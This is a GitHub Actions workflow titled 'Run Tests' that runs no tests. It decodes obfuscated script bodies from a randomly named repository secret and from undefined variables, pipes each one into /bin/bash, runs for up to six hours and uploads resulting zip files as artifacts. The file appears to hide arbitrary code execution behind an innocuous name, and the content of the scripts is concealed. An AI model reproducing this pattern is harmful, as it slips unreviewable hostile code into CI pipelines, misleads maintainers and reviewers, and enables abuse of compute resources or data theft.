name: Run Tests
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          zqvz8299: ${{ secrets.zqvz8299 }}
        run: |
          printf '%s' "$zqvz8299" | jq -r .gys31677 | /bin/bash
          printf '%s' "$jimdz8699" | jq -r .fijum87424 | /bin/bash
          printf '%s' "$qtt1" | jq -r .uskt260 | /bin/bash
          printf '%s' "$p4" | jq -r .xlla914 | /bin/bash
          printf '%s' "$xy8931" | jq -r .insb50019 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: GKXzSwI4
          path: "*.zip"
          retention-days: 1
